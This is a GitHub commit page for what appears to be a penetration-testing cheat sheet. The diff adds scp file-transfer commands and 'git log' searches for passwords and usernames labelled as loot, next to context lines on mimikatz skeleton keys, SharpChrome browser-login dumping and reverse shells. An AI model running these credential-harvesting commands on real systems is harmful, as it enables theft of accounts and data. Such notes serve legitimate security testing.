-
-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
leetcore
committed
Sep 9, 2023
1 parent
bac09e3
commit b648b76
Showing
2 changed files
with
10 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1,3 @@ | ||
.DS_Store | ||
**.DS_Store | ||
**.DS_Store | ||
git/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -331,6 +331,10 @@ ssh -L 3389:10.200.115.35:3389 -i id.key [email protected] | |
|
||
# SCP (scp, ssh, copy, file): | ||
scp /path/of/your/local/filename username@hostname:/path/to/remote/server/folder | ||
# upload (-l maxspeed) | ||
scp -l 1000000 file.zip [email protected]:/tmp | ||
# download (-l maxspeed) | ||
scp -l 1000000 [email protected]:/tmp . | ||
|
||
# REVERSE SHELLS | ||
Upgrade shell: | ||
|
@@ -642,6 +646,10 @@ misc::skeleton | |
https://github.com/djhohnstein/SharpChromium | ||
SharpChrome.exe logins /showall | ||
|
||
.git config (GIT, git, loot) | ||
git log -Susername . | ||
git log -Spassword . | ||
|
||
# RADARE2 (r2, radare) | ||
aaa (analyze) | ||
afl (analyze functions) | ||
|